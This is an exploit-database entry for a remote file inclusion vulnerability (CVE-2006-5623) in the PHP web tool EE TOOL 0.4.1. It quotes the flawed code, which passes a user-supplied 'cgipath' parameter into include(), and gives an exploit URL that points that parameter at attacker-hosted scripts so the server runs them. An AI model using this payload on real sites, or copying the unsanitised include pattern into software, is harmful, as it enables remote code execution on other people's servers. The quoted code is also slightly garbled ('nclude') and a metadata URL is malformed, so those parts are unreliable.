Electronic Engineering Tool (EE TOOL) 0.4.1 - Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: 
date_added: 2006-10-27 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-33843;CVE-2006-5623 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comeetool-0.4-1.tar.gz

Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz

Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");

Exploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts

Found: Cyber-Security

Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]